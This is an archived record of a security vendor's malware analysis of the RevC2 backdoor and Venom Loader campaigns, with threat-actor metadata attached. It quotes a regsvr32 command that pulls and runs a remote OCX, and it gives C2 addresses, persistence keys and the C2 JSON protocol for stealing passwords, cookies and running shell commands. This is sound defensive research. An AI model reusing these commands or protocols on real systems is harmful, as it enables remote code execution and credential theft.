{ "id": "d72e230c-5445-4d3a-b581-76540178c7f6", "created_at": "2026-04-06T00:06:57.284104Z", "updated_at": "2026-04-10T03:36:47.657717Z", "deleted_at": null, "sha1_hash": "9130f1bf920ec30a0c85bb56633670cc7f90ad58", "title": "Unveiling RevC2 and Venom Loader | ThreatLabz", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 822385, "plain_text": "Unveiling RevC2 and Venom Loader | ThreatLabz\r\nBy Muhammed Irfan V A\r\nPublished: 2024-12-02 · Archived: 2026-04-05 16:27:21 UTC\r\nTechnical Analysis\r\nThe following sections are a technical analysis of the campaigns. The URLs and file names used in these\r\ncampaigns vary with each sample. We analyzed a representative sample from each campaign.\r\nCampaign 1: API documentation lure leads to RevC2 \r\nThe first campaign, occurring from August to September, uses an API documentation lure to deliver a malicious\r\npayload, RevC2. RevC2 is a backdoor with capabilities to steal sensitive data.\r\nThe figure below illustrates the attack chain that leads to the delivery of RevC2.\r\nFigure 1: Attack chain of the first campaign delivering RevC2 as the payload. \r\nFirst stage: VenomLNK\r\nAlthough the distribution method is currently unknown, the first stage of the attack begins with a VenomLNK file.\r\nThis LNK file contains an obfuscated batch (BAT) script that when executed downloads a PNG image\r\nfrom  hxxp://gdrive[.]rest:8080/api/API.png . The PNG image is an API documentation lure, as shown in the\r\nfigure below.\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 1 of 11\n\nFigure 2: API documentation lure used in the first campaign that leverages the RevC2.\r\nThe VenomLNK file executes the following command in the background to register an ActiveX control, triggering\r\nthe execution of RevC2: \r\nwmic process call create \"regsvr32 /s /i \\\\gdrive.rest@8080\\api\\AdvancedWin.ocx\"\r\nSecond stage: RevC2\r\nThe second stage features RevC2, named after the Program Database (PDB) path observed in the binary: \r\nC:\\Users\\PC\\Desktop\\C2New\\Rev\\x64\\Release\\Rev.pdb\r\nUpon execution, RevC2 retrieves the command-line and checks whether the first argument ends with  dWin.ocx ,\r\nmatching the suffix of the filename. RevC2 then retrieves the path of the executable file for the current process and\r\ncompares it to  regsvr32.exe . The malicious software only executes if both checks pass, ensuring RevC2 is\r\nlaunched as part of the attack chain and not in analysis environments such as sandboxes.\r\nRevC2 then retrieves the operating system’s local time and creates a log file in the\r\nformat  C:\\ProgramData\\boot_%YYYYMMDDTHHMMSS%.log . The log file stores internal messages generated by the\r\nmalware during its execution.\r\nAn example of the log created by RevC2 is shown below:\r\n[2024-11-14 17:21:38.530681]: Multipler : 1\r\n[2024-11-14 17:22:01.546498]: Getting Passwords\r\nRevC2 communication protocol\r\nRevC2 uses WebSockets for C2 communication with the help of a C++ library, websocketpp. The C2 address is\r\nhardcoded in the binary. In the sample we examined, the address was  ws://208.85.17[.]52:8082 .\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 2 of 11\n\nAll data exchanged between the victim’s machine and the C2 server are JSON objects. \r\nVictim’s machine to C2 server: This JSON object includes two properties: \r\n1. The output being sent.\r\n2. The  command_ID type of the output.\r\nThe format of this JSON object is: \r\n{\"%output_name%\": \"%output_value%\",\"type\":\"%command_ID%\"}  \r\nC2 server to victim’s machine: This JSON object includes two properties:\r\n1. type : Contains a  command_ID that tells the malware what actions to perform.\r\n2. command : Contains the  command_parameter  related to the action to be performed. In some cases,\r\nthe command property is empty.\r\nThe format of this JSON object is: \r\n{\"type\":\"%command_ID%\",\"command\":\"%command_parameter%\"}\r\nThe  command_ID sent by RevC2 to the C2 server is not always the same as the  command_ID sent by the C2 server\r\nto RevC2. In two cases (when executing shell commands and taking screenshots) the  command_ID is different, as\r\nshown in Table 1 and Table 2.\r\nClient registration\r\nThe first data sent to the server is related to registration. The data is a JSON object in the format  {\"name\":\r\n\"%computername%\",\"type\":\"0005\"} .\r\nThe figure below shows example network traffic between the victim’s machine and the C2 server.\r\nFigure 3: Example network traffic between a system infected with RevC2 and the C2 server.\r\nCommands supported\r\nRevC2 registers a function handler, which processes the  command_ID and  command_parameter from the C2\r\nserver and performs the appropriate actions. The  command_ID ’s supported by RevC2 are described in the table\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 3 of 11\n\nbelow.\r\nAction command_ID command_parameter Description\r\nSteals\r\npasswords\r\n000000 Empty\r\nSteals passwords from Chromium\r\nbrowsers. \r\nRevC2 starts with writing an entry\r\nto the log file with the message\r\n“Getting Passwords”. Then,\r\nRevC2 retrieves saved passwords\r\nfrom Chromium browsers and\r\nsends them to the C2 server.\r\nExecutes\r\nshell\r\ncommands\r\n0001 %command%\r\nExecutes shell commands. \r\nThe  command_parameter contains\r\nthe command to be executed. A\r\nnew thread is created to execute\r\nthe command. The  %command% is\r\nappended with  cmd /c  and this\r\ncommand-line is used to create a\r\nnew process. A pipe is created and\r\nthe standard output and error of\r\nthe process is redirected to this\r\npipe. The output is read from the\r\npipe and sent to the C2 server.\r\nTakes\r\nscreenshots\r\n0002 %mutipler% Takes screenshots of the victim’s\r\nsystem. \r\nThe  command_parameter sent is\r\nused as the multiplier. The width\r\nand height of the desktop’s screen\r\nin pixels is multiplied with this\r\nvalue to configure the resolution\r\nof the screenshot. The activity is\r\nadded to the log file in the\r\nformat:  [%TimeStamp%]:Multipler\r\n: %mutipler% . A screenshot of the\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 4 of 11\n\nAction command_ID command_parameter Description\r\nvictim’s desktop is taken, base64-\r\nencoded, and sent to the C2 server.\r\nProxies\r\ntraffic\r\n0003\r\n{\"listenerIP\":\"%ip%\",\"listenerPort\"\r\n:\"%port%\"}\r\nProxies network data using the\r\nSOCKS5 protocol. \r\nRevC2 receives data to proxy by\r\nthe C2 server in\r\nthe  command_parameter . There\r\nare two internal command IDs that\r\nRevC2 uses:\r\n0x55 - Connects to a\r\ntarget address and proxies\r\ndata to the proxy server.\r\n0x70 - Sends data to the\r\nconnected socket (created\r\nby using the command ID\r\n0x55) from the proxy\r\nserver.\r\nSteals\r\ncookies\r\n0009 Empty\r\nSteals cookies from Chromium\r\nbrowsers. \r\nRevC2 starts with writing an entry\r\nto the log file with the message\r\n“Getting Cookies”. This ID also\r\nlogs details related to stealing\r\ncookies in the log file. Then,\r\nRevC2 retrieves saved cookies\r\nfrom Chromium browsers and\r\nsends them to the C2 server.\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 5 of 11\n\nAction command_ID command_parameter Description\r\nExecutes a\r\ncommand\r\nas a\r\ndifferent\r\nuser\r\n0012\r\n{\"username\": \"%username%\",\"password\":\r\n\"%password%\",\"command\":\r\n\"%commandline%\"}\r\nExecutes a command as a different\r\nuser using the credentials\r\nreceived. \r\nThe  %commandline% can be a file\r\npath or a command. RevC2 does\r\nnot send the command's output to\r\nthe C2 server.\r\nTable 1: Description of the commands supported by RevC2.\r\nThe data format for each RevC2  command_ID is listed in the table below.\r\nAction command_ID Data Format\r\nSteals passwords 000000\r\n{\"passwords\":\"Application: %application%\r\nWebsite: %website%\r\nLogin URL: %url%\r\nUser name: %username%\r\nPassword: %password%\r\n\",\"type\":\"000000\"}.\r\nExecutes shell commands 0007\r\n{\"result\":\"%output_of_command%”,\r\n\"type\":\"0007\"}\r\nTakes screenshots 0006\r\n{\"image\":\"%base64encoded_image%”,\r\n\"type\":\"0006\"}\r\nProxies traffic 0003 N/A\r\nSteals cookies 0009\r\n{\"cookies\":\"[\r\n{\r\n\"Application\":\"%application%\",\r\n\"domain\": \"%domain%\",\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 6 of 11\n\nAction command_ID Data Format\r\n\"expirationDate\": %exp_Date%,\r\n\"httpOnly\": %http_only%,\r\n\"name\": \"%cookie_name%\",\r\n\"path\": \"%path%\",\r\n\"sameSite\": \"%samesite%\",\r\n\"Secure\": %secure%,\r\n\"url\": \"%url%\",\r\n\"value\": \"%cookie_value%\"\r\n}\r\n]\", \"type\": \"0009\"}\r\nExecutes a process as a different\r\nuser\r\n0012 N/A\r\nTable 2: Data format for the command_ID’s supported by RevC2.\r\nThreatLabz created a Python script that emulates a RevC2 server. The script is available in our GitHub repository.\r\nThe figure below shows example output of an emulated RevC2 server.\r\nFigure 4: Python script emulating the RevC2 server.\r\nCampaign 2: Crypto transaction lure leads to Venom Loader and Retdoor malware \r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 7 of 11\n\nThe second campaign, occurring from September to October, appears to be using a cryptocurrency transaction lure\r\nto deliver Venom Loader. Venom Loader then loads  Retdoor , a JavaScript (JS) backdoor providing remote code\r\nexecution (RCE) capabilities to the threat actor.\r\nThe figure below illustrates the attack chain for the second campaign delivering  Retdoor .\r\nFigure 5: Attack chain of the second campaign delivering  Retdoor as the payload. \r\nFirst stage: VenomLNK\r\nAlthough the method of distribution is currently unknown, the first stage of the attack begins with a VenomLNK\r\nfile. The LNK file contains an obfuscated BAT script which writes a Visual Basic Script (VBS) script\r\n( run_bat.vbs ) and a BAT script ( bat2.bat ) to the Windows temporary directory. VenomLNK first\r\nexecutes  run_bat.vbs , which is used to execute  bat2.bat . The  bat2.bat file downloads an image of a\r\ncryptocurrency transaction as a lure and displays the image to the victim, as shown in the figure below.\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 8 of 11\n\nFigure 6: Cryptocurrency transaction lure used in the second campaign that leverages Venom Spider tools.\r\nIn the background, the malware downloads  base.zip from  hxxp://170.75.168[.]151/%computername%/aaa . \r\nThe BAT file then unzips  base.zip , which contains  ApplicationFrameHost.exe . From here, the BAT file\r\nexecutes  ApplicationFrameHost.exe which sideloads a malicious DLL named  dxgi.dll , leading to the\r\nexecution of Venom Loader.\r\nSecond stage: Venom Loader\r\nThe Venom Loader DLL used in this campaign is custom built for each victim and is used to load the next stage.\r\nAs mentioned before,  base.zip , which contains Venom Loader, is downloaded\r\nfrom  hxxp://170.75.168[.]151/%computername%/aaa . \r\nThe  %computername% value is an environment variable which contains the computer name of the system. Venom\r\nLoader uses  %computername% as the hardcoded XOR key to encode the following stages.\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 9 of 11\n\nIn this instance, Venom Loader is used to load the  Retdoor backdoor.  Retdoor ’s content is stored as plain text\r\nin Venom Loader. The content is XOR’ed with the  %computername% and base64-encoded. The result of this is split\r\ninto three chunks and written to disk with the file names  text1 ,  text2 , and  text3 . \r\nAfter this, Venom Loader writes a PowerShell (PS) script to  %APPDATA%\\Adobe\\merge.ps1 , which is used to\r\ndecode the chunks stored in  text1 ,  text2 , and  text3 , and write it to  %LOCALAPPDATA%\\Microsoft\\hello.js .\r\nThen  hello.js is executed using cscript. \r\nNext, Venom Loader creates a VBS script named  run_all.vbs in the  %APPDATA%\\Adobe directory. This script is\r\ndesigned to execute commands passed to it as command-line arguments. Then,  run_all.vbs is used to\r\nrun  merge.ps1 leading to execution of  Retdoor . Finally, Venom Loader establishes persistence for\r\nthe  Retdoor backdoor by adding  merge.ps1 to the autorun registry\r\nkey  HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run under the name  GoogleUpdate .\r\nThird stage: Retdoor\r\nRetdoor continuously sends HTTP POST requests in an infinite loop to  /api/infos . The POST data is\r\nformatted as  name=^%computername%\u0026ret= . The name contains the victim’s computer name and the first request\r\nwill have ret as an empty string. The output of the command to be executed is returned in the next request inside\r\nthe  ret parameter. The figure below shows the network traffic between a system infected with  Retdoor\r\nmalware and the C2 server.\r\nFigure 7: Network traffic between a system infected with  Retdoor and the C2 server.\r\nThe response of the request is JSON data in the format {\"command\": %command_encoded%} .\r\nThe  command_encoded is XOR’ed with  %computername% and written to the Windows temporary directory as\r\na  .cmd file and executed.\r\nExplore more Zscaler blogs\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 10 of 11\n\nSource: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader" ], "report_names": [ "unveiling-revc2-and-venom-loader" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "f2fa9952-301f-4376-ac69-743d6f2bec1e", "created_at": "2023-01-06T13:46:39.122721Z", "updated_at": "2026-04-10T02:00:03.22231Z", "deleted_at": null, "main_name": "VENOM SPIDER", "aliases": [ "badbullz", "badbullzvenom" ], "source_name": "MISPGALAXY:VENOM SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "7a257844-df90-4bd4-b0f1-77d00ff82802", "created_at": "2022-10-25T16:07:24.376356Z", "updated_at": "2026-04-10T02:00:04.964565Z", "deleted_at": null, "main_name": "Venom Spider", "aliases": [ "Golden Chickens", "TA4557", "Venom Spider" ], "source_name": "ETDA:Venom Spider", "tools": [ "More_eggs", "PureLocker", "SONE", "SpicyOmelette", "StealerOne", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Taurus Loader Reconnaissance Module", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraCrypt", "TerraLogger", "TerraPreter", "TerraRecon", "TerraStealer", "TerraTV", "TerraWiper", "ThreatKit", "VenomKit", "VenomLNK", "lite_more_eggs" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434017, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9130f1bf920ec30a0c85bb56633670cc7f90ad58.pdf", "text": "https://archive.orkl.eu/9130f1bf920ec30a0c85bb56633670cc7f90ad58.txt", "img": "https://archive.orkl.eu/9130f1bf920ec30a0c85bb56633670cc7f90ad58.jpg" } }